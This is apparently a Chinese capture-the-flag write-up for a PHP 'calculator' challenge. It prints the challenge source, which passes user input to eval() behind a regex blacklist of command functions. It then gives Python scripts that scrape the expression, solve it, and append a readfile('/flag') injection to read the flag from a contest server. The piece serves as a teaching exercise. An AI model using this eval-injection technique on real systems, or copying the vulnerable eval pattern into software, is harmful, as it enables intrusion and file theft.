一道简单的计算器

Comments

一道简单的计算器

考点:写脚本

题目源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
<?php
header("Content-Type: text/html;charset=utf-8");
session_start();
function calculator(){
    srand(time());
    $param1 = rand();
    $param2 = rand();
    $flag  =rand(0,4);
    switch ($flag) {
        case 0:
            return sprintf("%s+%s",$param1,$param2);
        break;
        case 1:
            return sprintf("%s-%s",$param1,$param2);
        break;
        case 3:
            return sprintf("%s*%s",$param1,$param2);
        break;
        case 4:
            return sprintf("%s/%s",$param1,$param2);
        break;
    }
    
}

function waf($str){
    if(preg_match("/put|sys|exec|\`|\^|\%|\~\/|passthru|popen|cat|\\|preg|ph|\<\?|\<|ar|un|sc|va/is", $str)){
        die("no hack");
    }
}

if(isset($_GET['a'])){
    waf($_GET['a']);
    $payload = preg_replace("/;/", "", $_GET['a']);
    $go = sprintf("\$check=(%s==%s);",$_SESSION['expr'],$payload);
    //echo $go;
    eval($go);
    if($check){
        $_SESSION['expr'] =  calculator();
        $answer =  "U 4re right";
    }else{
        $answer =  "Try again!";    
    }
}else{
    $_SESSION['expr']=calculator();
}


if(isset($_GET['source'])){
    highlight_file(__FILE__);
    die();
}

?>

<!DOCTYPE html>
<html lang="zh-CN"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- 上述3个meta标签*必须*放在最前面,任何其他内容都*必须*跟随其后! -->
    <title>简单的计算题</title>

    <!-- Bootstrap -->
    <link href="static/bootstrap.css" rel="stylesheet">

  </head>
  <body>
  <!-- jQuery (Bootstrap 的所有 JavaScript 插件都依赖 jQuery,所以必须放在前边) -->
    <script src="static/jquery-3.js"></script>
    <!-- 加载 Bootstrap 的所有 JavaScript 插件。你也可以根据需要只加载单个插件。 -->
    <script src="static/bootstrap.js"></script>

    
<div class="row">
        <div class="col-md-4">
        </div>
        <div class="col-md-4" position="absolute">
        <div class="page-header">
            <h1>简单的计算题</h1>
        <br><br><br>
            
                <h4><?php echo $_SESSION['expr'];?></h4>
            
        </div>
            <form role="form" method="GET" action="">
              <div class="form-group">
                <label for="name">答案</label>
                <input type="text" class="form-control" id="name" name="a" placeholder="请输入你的答案">
              </div>
              <button type="submit" class="btn btn-default">提交</button>
            </form>
            <center><a href="?source">Source</a></center>
            <h3><?php echo $answer ;?></h3>
        </div>
        <div class="col-md-4">
        </div>
</div>




  
</body></html>

通过代码审计,$a是我们能控制的地方。过滤了一些东西,但是没有过滤file_get_contents、readfile等等。这里用readfile

先写一段代码,把页面信息爬下来。

1
2
3
4
5
import requests  
import re        
r = requests.session();   
result=r.get("http://47.98.234.232:28071/")
print(result.text)

找到要计算的式子位置。

image-20201125224610661

修改代码,显示运算结果

1
2
3
4
5
6
7
import requests  
import re       
r = requests.session();   
result=r.get("http://47.98.234.232:28071/")
expr=re.findall("<h4>(.*?)</h4>",result.text)
print(eval(expr[0]))

image-20201125225004405

初步脚本已写好。将需要注入的字符串粘在计算结果通过$a一起输入进去,读flag

1
2
3
4
5
6
7
8
9
10
import requests  
import re        
r = requests.session();   
result=r.get("http://47.98.234.232:28071/")
expr=re.findall("<h4>(.*?)</h4>",result.text)
print(eval(expr[0]))
url="http://47.98.234.232:28071/?a=%s"%str(eval(expr[0]))+" and print_r(readfile('/flag'))"
print(url)
a=r.get(url)
print(a.text)

image-20201125225823593

chickenmushroomWeb

平平无奇的小红帽。